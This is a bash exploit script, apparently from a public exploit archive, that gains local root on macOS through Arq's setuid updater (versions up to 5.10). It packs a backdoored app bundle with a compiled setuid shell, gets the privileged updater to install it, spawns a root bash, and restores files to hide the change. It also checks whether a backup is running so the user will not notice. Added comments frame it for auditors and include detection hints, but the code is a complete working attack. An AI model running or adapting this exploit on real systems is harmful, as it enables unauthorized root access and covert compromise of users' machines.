Arq 5.10 - Local Privilege Escalation (2)
来源:https://m4.rkw.io/blog.html 作者:m4rkw 发布时间:2018-01-30  
#!/bin/bash
 
#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html              ######
#################################################################
#
# Reviewer notes (read from the code in this listing):
#  - The script only proceeds when arq_updater inside the "Arq Agent" login
#    item is listed as setuid ('-rws') with "root" on the same ls line; its
#    own error message ties that state to auto-updates being enabled.
#  - Later in the script that setuid helper is run by the unprivileged user
#    with an "installupdate" argument and a file:// URL pointing at an
#    archive the user built. The weakness being demonstrated is therefore a
#    privileged updater acting on caller-supplied input; presumably the
#    archive's origin or signature is not verified - confirm against the
#    vendor's advisory.
#  - To audit a host, the same listing used for $vuln below shows whether
#    the setuid-root helper is present. The banner above gives the affected
#    range as Arq <= 5.10.
 
# Paths inside the installed bundle: the application root, its Resources
# directory, and the Resources directory of the "Arq Agent" login item.
app="/Applications/Arq.app"
res="$app/Contents/Resources"
lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources"
 
# Precondition: $vuln is non-empty only if the ls line for arq_updater
# contains '-rws' (setuid bit set on the owner-execute position) and the
# string "root" somewhere on that line.
vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root`
 
# Without a setuid-root updater the rest of the script has nothing to act
# on, so it stops with exit status 1.
if [ "$vuln" == "" ] ; then
  echo "Not vulnerable - auto-updates not enabled."
  exit 1
fi
 
# Gate that is skipped when the first argument is -f: take the most recently
# modified file in ~/Library/Logs/Arq Agent, find the last line matching
# "backup session ... ended|started" (case-insensitive), and keep it only if
# it says "started". A non-empty result is treated as "backup still running".
# Defensive takeaway: the author's own warning states that the later steps
# are likely to be noticed by the user while a backup is in progress.
if [ "$1" != "-f" ] ; then
  latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`"
  status_line="`egrep -i 'backup session.*?(ended|started)' \
    \"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`"
 
  # Last session marker was "started" with no later "ended": stop with
  # exit status 1 unless the caller overrides with -f.
  if [ "$status_line" != "" ] ; then
    echo -n "WARNING: backup in progress, the user will very "
    echo "likely notice if we exploit now!"
    echo "use -f to override."
    exit 1
  fi
fi
 
# Remember the starting directory; the final loop of the script changes
# back to it before running the installed binary.
owd="`pwd`"
 
# Recreate a fixed-name staging directory in the user's home. The name
# ~/.arq_510_privesc_exp is a file-system artifact of this script, but the
# generated payload.sh deletes it again, so it only exists during a run.
if [ -e ~/.arq_510_privesc_exp ] ; then
  rm -rf ~/.arq_510_privesc_exp
fi
 
mkdir ~/.arq_510_privesc_exp
cd ~/.arq_510_privesc_exp
 
echo "copying application..."
 
# Work on a private copy of the whole bundle; the installed application is
# not modified by this script directly, only later through arq_updater.
cp -R /Applications/Arq.app .
 
echo "compiling payloads..."
 
# Generate payload.sh in the staging directory. The here-document delimiter
# is unquoted, so $HOME and $app are expanded now, while the escaped \` and
# \$ are left for payload.sh to evaluate when it runs.
# What the generated script does, as written below:
#   1. removes the staging directory ($HOME/.arq_510_privesc_exp);
#   2. loops, with no sleep between iterations, until ps shows a process
#      whose command line contains "$app/Contents/MacOS/Arq";
#   3. sends that process SIGKILL and re-opens the "Arq Agent" login item.
# Signals a defender can look for: an abrupt kill of the Arq process followed
# by a relaunch of the agent, and a short busy-loop of ps invocations.
cat > payload.sh <<EOF
#!/bin/bash
rm -rf $HOME/.arq_510_privesc_exp
while :
do
  pid=\`ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \
    |cut -d ' ' -f2\`
  if [ "\$pid" != "" ] ; then
    kill -9 \$pid
    open $app/Contents/Library/LoginItems/Arq\ Agent.app
    exit 0
  fi
done
EOF
# Make the generated script executable (mode 755).
chmod 755 payload.sh
 
# Path of the login item's standardrestorer with the leading /Applications/
# stripped. NOTE(review): au_relative is not referenced anywhere else in
# this listing.
au_relative=`echo "$lires/standardrestorer" |sed 's/^\/Applications\///'`
 
# Generate the C source for a stand-in "standardrestorer". The delimiter is
# unquoted, so $res and $HOME are baked into the string literals at
# generation time. As written, the program does nothing unless its first
# argument is "boom"; in that case it calls setuid(0) and setgid(0) and
# execs bash -c with a command line that
#   - moves standardrestorer.orig back over standardrestorer in $res and
#     sets mode 4755 on it,
#   - runs payload.sh from the staging directory,
#   - starts /bin/bash.
# Because the original binary is moved back into place, the installed
# bundle's file state after a run is not a dependable indicator; process
# and exec telemetry around arq_updater and standardrestorer is the better
# place to look.
cat > shell.c <<EOF
#include <unistd.h>
#include <string.h>
int main(int ac, char *av[])
{
  if (ac > 1 && strcmp(av[1], "boom") == 0) {
    setuid(0);
    setgid(0);
    execl(
      "/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr"
      "estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay"
      "load.sh;/bin/bash", NULL
    );
  }
  return 0;
}
EOF
# In the copied bundle, keep the genuine binary as standardrestorer.orig and
# compile the stand-in to the original name, so both ship in the archive
# built from this copy.
mv Arq.app/Contents/Resources/standardrestorer \
  Arq.app/Contents/Resources/standardrestorer.orig
gcc -o Arq.app/Contents/Resources/standardrestorer shell.c
# The C source is no longer needed once the binary exists.
rm -f shell.c
 
# Eighth space-separated field of stat's output for the stand-in binary;
# the variable name indicates this is the file size (presumably the default
# BSD/macOS stat layout - confirm on the target platform).
payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8`
# Numeric primary group id of the caller, cut out of the "gid=N(name)" part
# of id's output.
GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1`
# Absolute path of the staging directory, used to build the file:// URL.
cwd=`pwd`
 
echo "creating backdoored Arq.zip..."
# Pack the modified copy of the bundle into Arq.zip (fastest compression,
# recursive), discarding zip's output, then delete the unpacked copy.
zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null
rm -rf Arq.app/
 
echo "executing upgrade..."
 
# Run the setuid-root arq_updater as the current user with the
# "installupdate" argument, a file:// URL of the locally built archive, the
# caller's UID and GID, and the literal YES; all output is discarded. The
# meaning of the trailing arguments is not shown in this listing.
# This is the trust boundary at issue: a privileged helper is handed an
# update location chosen by an unprivileged caller. An arq_updater process
# started with a file:// URL under a user's home directory is the clearest
# single event to alert on.
"$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \
  1>/dev/null 2>/dev/null
 
echo "waiting..."
# Poll every 0.2 s until the installed standardrestorer (a) has the same
# size field as the stand-in built in the staging directory and (b) is
# listed with mode -rwsr-xr-x and "root" on the ls line. That condition
# only becomes true if the updater installed the archive's file as
# setuid-root, which is what the script relies on.
while :
do
  ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8`
  x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root`
 
  # Both conditions met: return to the starting directory and run the
  # installed binary with the "boom" argument that the generated shell.c
  # checks for, then exit with status 0.
  if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then
    cd "$owd"
    $res/standardrestorer boom
    exit 0
  fi
  sleep 0.2
done
 